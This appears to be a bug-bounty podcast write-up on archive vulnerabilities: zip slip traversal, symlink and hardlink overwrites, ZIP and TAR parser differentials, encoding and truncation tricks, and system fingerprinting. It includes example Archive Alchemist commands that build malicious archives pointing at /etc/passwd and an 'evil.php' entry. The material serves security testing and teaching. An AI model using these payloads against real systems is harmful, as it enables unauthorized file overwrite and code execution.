[HackerNotes Ep. 132] Archive Testing Methodology with Mathias Karlsson

Justin is joined by Mathias Karlsson to discuss vulnerabilities associated with archives. They talk about his new tool, Archive Alchemist, and explore topics like the significance of Unicode paths, symlinks, and TAR.

Hacker TL;DR

  • Archive Alchemist was born from Mathias’ frustration with repeatedly looking up archive utility parameters for testing archive-based bugs. It streamlines testing by making it easier to list, add, remove, and extract files without referencing manual pages.

  • The 3 main archive-based attack vectors:

    • Path Traversal (classic "zip slip") using paths like "../" to extract files outside intended directories;

    • Link-Based Overwrites using symbolic or hard links to place files outside extraction paths, potentially leading to RCE;

    • Parser Differential Bugs that exploit inconsistencies between validation and extraction parsers, when one parser validates the archive and another extracts it, mismatches in filename interpretation can allow malicious files to bypass security checks.

  • ZIP filename inconsistencies: Central Directory Header, Local File Header, and Unicode Path inconsistencies create opportunities for parser differentials. Validation might check the CDH showing "file.json" while extraction uses the Unicode Path field containing "../../../../etc/passwd". Additional attack vectors include UTF-16 normalization/confusion (Java tools interpret these inconsistently), CRC mismatches (Windows Explorer vs PowerShell), NULL byte handling variations (some tools truncate while others replace with spaces), and "overlong UTF-8" encoding that conceals special characters like slashes by encoding them as multi-byte sequences.

  • Path length truncation: Linux has a typical max path of 4096 characters, and most programming languages raise errors beyond this limit. Tools like "unzip" silently truncate filenames, allowing us to craft archives with long fake paths that drop malicious files like ".exe" at the end after truncation. This technique can also be weaponised as an information leak. Progressively shorten paths until errors stop so we can precisely determine the extraction path length, revealing server directory structures bit by bit.

  • System fingerprinting: Uploading files named “CON”, “NUL”, or “<>” identifies Windows systems when they break (these are NTFS reserved names); path truncation at 4096 characters indicates Linux while 260 suggests Windows. Symlink testing can reveal whether a target system supports symlinks by first establishing a baseline with normal files, then testing symlinks to normal files, and finally trying symlinks to sensitive paths like “/etc/passwd”. 7zip has a unique quirk where it uses the archive's filename when extracting entries with empty filenames.

Archive Alchemist: Archive-based Vulnerabilities

This episode of the Critical Thinking podcast features Mathias Karlsson (his third appearance after episodes 50 and 68) discussing his new tool, Archive Alchemist, and various archive-based security vulnerabilities.

Why Archive Alchemist Was Created

Mathias explained that he created Archive Alchemist after repeatedly dealing with archive-related bugs that required custom archive creation. Even though archive related bug are very old, it was a pain to test for them, so the tool was born out of frustration with constantly having to look up archive utility parameters and commands. His goals were to:

  • Make testing for archive-based vulnerabilities faster

  • Make it easier to list, add, remove and extract files

  • Eliminate the need to constantly reference manual pages for zip/unzip utilities

Justin added that it’s really important to have tools like this that help you create patterns not only for yourself but also for your testing. One of the biggest differences between hackers who find a ton of bugs and the ones who find a few bugs here and there is that the hackers who find a ton of bugs see patterns in the application.

An example: you find a bug somewhere, and then you think about that bug and start seeing patterns in the development in that specific application. “If this bugs exists, maybe they think about developing such features this way, and this development pattern might also lead to these types of bugs”

Archive-Based Attacks

For Mathias, there are mainly three types of archive-based attacks:

  • Path Traversal

    Using paths like ../ inside the archive to make the server extract files outside the intended directory. This is the classic “zip slip” issue, though it predates that name.

  • Link-Based Overwrites

    Using symbolic links (or hard links, in the case of TAR) inside the archive to overwrite or place files outside the extraction path. This can potentially lead to things like RCE, depending on where the links point and what gets written.

  • Parser Differential Bugs

    When one parser (or library) validates the archive and another one extracts it, and they don’t agree on things like filenames or entry structure. This mismatch can let malicious files bypass validation and still get extracted.

How Archive Alchemist Works

The tool currently supports .tar, .zip and .tar.gz and offers simple commands to interact with and manipulate archives:

# Basic operations
aral example.zip ls
aral example.zip cat file.txt
aral example.zip replace example.json --symlink /etc/passwd
aral original.zip replace --content-directory workdir/

# Suggested work setup
aral original.zip replace --content-directory workdir/

# Example of attack payloads
aral original.zip add ../../../../../../etc/passwd
aral original.zip add file.json --symlink /etc/passwd
aral original.zip add file.json --unicodepath evil.php --content="evil code"

Archive Formats & Exploitation

Mathias walks through the internal structure of ZIP and TAR formats to show how archive bugs work and why they’re still relevant. Many of these bugs come from how different tools parse archives and how filenames are stored - especially when validation and extraction don’t rely on the same parser.

ZIP Internals and Exploitable Behaviours

ZIP files are parsed by first locating the End of Central Directory Header (EOCDH), which points to the Central Directory - a list of entries describing all files in the archive. Each entry has a Central Directory Header (CDH) with metadata like filename, compression method, and offsets. To extract a file, the parser follows that offset to find the Local File Header (LFH) and reads the file data.

Filenames can appear in three different places:

  • In the CDH (filename field)

  • In the LFH (filename field)

  • In the Unicode Path extra field (inside the CDH and LFH)

This gives attackers room to craft mismatches. For example, the CDH might list file.json, but the LFH or Unicode Path could say ../../../../etc/passwd. If validation only checks the CDH but extraction relies on the LFH or Unicode field, you’ve got a parser differential - and possibly an overwrite.

Mathias shares a few examples:

  • Two ZIP entries with the same name can confuse extractors. Some tools validate entry names during iteration, but use extractall() later - which may extract the second entry instead of the first. That’s enough to bypass naive validation logic.

  • Java tooling is inconsistent, java.util.zip and org.apache.commons.compress.archivers.zip don’t treat Unicode paths the same way, which leads to cases where validation and extraction operate on completely different filenames.

  • CRC mismatches in the Unicode Path field behave differently depending on the unzipper. Windows File Explorer will still use the Unicode path even if the CRC is invalid. PowerShell, on the other hand, rejects it. Same file, different results depending on the tool.

  • NULL byte handling also varies. Tools like 7z, unzip, and Python truncate filenames at the first NULL byte. PHP, on the other hand, replaces it with a space (0x20), potentially creating different outputs with the same archive.

  • Continuation bytes are part of UTF-8's multi-byte sequence representation of characters. In UTF-8 encoding:

    • The first bit in a byte determines if it's a single-byte character (if it's 0)

    • For multi-byte sequences, the first byte starts with specific bit patterns (110 for two bytes, 1110 for three bytes, etc.)

    • Continuation bytes always start with the pattern "10" followed by six more bits

      • "overlong UTF-8" exploit: you can represent simple ASCII characters (like 'A') using multiple bytes instead of just one, some unzip tools will normalise these overlong sequences back to their simple forms, for example: unzip on linux when LANG environment variable has no explicit encoding. Basically, this lets us hide special characters like slashes (/) in filenames by encoding them as multi-byte sequences. Validation might miss these, but they get properly interpreted during extraction, great for path traversal attacks.

  • Path length truncation: on Linux, the typical max path length is 4096 characters. Most programming languages will raise an error if you go beyond that. But unzip does something different: it just silently truncates the filename. So you can craft an archive with a long fake path and have it drop something like .exe or evil.sh at the end and unzip will happily extract just that, discarding the p’refix. It’s an easy way to bypass filters that rely on checking full paths or extensions.

    • You can also use this behaviour to check how long the path that the file is being extracted is and then guess the exact path. You make it 4096 chars and keep shortening it until it stops giving an error, so you will know but the subtracted char quantity how long the path was.

  • 7zip when handling empty filenames in archives: when an archive contains an entry with an empty filename (zero length), most parsers will reject it as invalid or treat it as the current working directory. 7zip, however, uses the archive's own filename as the extracted filename. If you have ctbb.zip with an empty-named entry, 7zip will extract it as ctbb

  • Testing symlinks: establish a baseline by testing a normal file (e.g., "filename") to observe proper behaviour. Then, create a test where a file named "hello" is made as a symlink to "filename", if this gives the same results as the baseline, symlinks might be supported. Finally, test a third case where the symlink points to something that should fail (e.g., "/etc/passwd"). If the third case fails while the second works, you can deduce that the system supports symlinks. + You can use the path length truncation trick to get an idea of how long the path you’re in is and guess the path by it’s length. Get info, bit by bit to extract a lot of information in the end.

Note from Mathias:

  • “I have seen one time an app where FILENAME => symlink => TARGET did not work but FILENAME => symlink => symlink => TARGET did work (multiple symlink "hops")”

  • “I have seen apps that normalize \\ to / after "path traversal check/normalization" is done (so ../ does not work, but ..\\ does)”

TAR Internals and Behaviours

TAR files are simpler and don’t have a central directory. They’re parsed sequentially: each entry starts with a 512-byte header block, followed by the file content. This continues until the end of the archive.

TAR filenames can come from:

  • The filename field in the header

  • A combination of prefix + filename

  • A special @LongLink file (GNU TAR), where the long filename is in the file data, followed by the real file

  • A special @PaxHeaders.X/ entry (POSIX TAR), where the metadata contains path=... for the next file

As with ZIPs, different TAR parsers treat these fields differently. Some understand @LongLink but ignore @PaxHeaders. Some tools get tripped up when two entries have the same name. Any mismatch between validation and extraction logic creates an opening for confusion bugs.

Payloads, Tooling, and Examples

Mathias built Archive Alchemist to simplify archive testing. Instead of writing payloads by hand or dealing with weird CLI flags, you can use simple one-liners like:

aral example.zip ls
aral example.zip cat file.txt
aral example.zip replace example.json --symlink /etc/passwd
aral original.zip replace --content-directory workdir/
aral original.zip add ../../../../../../etc/passwd
aral original.zip add file.json --symlink /etc/passwd
aral original.zip add file.json --unicodepath evil.php --content="evil code"

This makes it fast to test a range of archive bugs:

  • Path Traversals: Escape the target directory using ../ chains and write files where you shouldn't.

  • Symlink Injection: Insert a symlink to overwrite sensitive paths (like /etc/passwd) during extraction.

  • Hardlink Abuse (TAR only): Use TAR’s hardlink feature to point to existing files and overwrite or expose them.

  • Unicode & Encoding Confusion: Break validation using null bytes, overlong UTF-8 sequences, or invalid normalisation.

  • Parser Differential Abuse: Exploit tools that validate using one parser and extract using another, crafting mismatched file entries that bypass checks.

He also shares a few tricks for fingerprinting the target system:

  • Upload files like CON, NUL, or <>. If it breaks, you’re probably on Windows (NTFS). If not, it’s likely Linux.

  • If path truncation happens at 4096 characters, it’s probably Linux. If it happens at 260, it’s probably Windows.

  • By slightly shrinking paths until they stop breaking, you can estimate the full base path used during extraction.

That’s it for the week.

And as always, keep hacking!